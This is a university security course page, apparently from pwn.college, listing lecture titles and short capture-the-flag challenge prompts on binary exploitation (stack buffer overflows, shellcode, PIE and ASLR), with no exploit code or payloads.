Binary Exploitation


CSE 365 - Spring 2024

Now let's put everything together and learn how to exploit binaries.


Lectures and Reading

Recorded Lectures:

11/22/23 Binary Security Pt. 1:



11/27/23 Binary Security Pt. 2:



11/29/23 Binary Security Pt. 3:



The excellent Zardus (creator of pwn.college) has recorded lectures and slides that might be useful:

Shellcode Injection: Introduction



Shellcode Injection: Common Challenges



Shellcode Injection: Data Execution Prevention



Memory Errors: Introduction



Memory Errors: High-level Problems



Memory Errors: Smashing the Stack



Memory Errors: Causes of Corruption 1



Memory Errors: ASLR



Memory Errors: Causes of Disclosure



Exploitation Scenarios: Introduction



Exploitation Scenarios: Hijacking to Shellcode




Challenges

Exploit a (memory corruption) stack injection vulnerability

Write and execute shellcode to read the flag!

Write and execute shellcode to read the flag, but a portion of your input is randomly skipped.

Write and execute shellcode to read the flag, but your inputted data is filtered before execution.

Overflow a buffer on the stack to set the right conditions to obtain the flag!

Overflow a buffer on the stack to set the right conditions to obtain the flag!

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Overflow a buffer on the stack to set trickier conditions to obtain the flag!

Overflow a buffer and smash the stack to obtain the flag!

Overflow a buffer and smash the stack to obtain the flag!

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Overflow a buffer and smash the stack to obtain the flag, but this time bypass another check designed to prevent you from doing so!

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary!

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Overflow a buffer and smash the stack to obtain the flag, but this time in a position independent (PIE) binary with an additional check on your input.

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Overflow a buffer and leak the flag. Be warned, this requires careful and clever payload construction!

Write a full exploit involving shellcode and a method of tricking the challenge into executing it.

Write a full exploit involving shellcode and a method of tricking the challenge into executing it.

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it. Note, ASLR is disabled!

Write a full exploit involving injecting shellcode and a method of tricking the challenge into executing it. Note, ASLR is disabled!


30-Day Scoreboard:

This scoreboard reflects solves for challenges in this module after the module launched in this dojo.

Rank Hacker Badges Score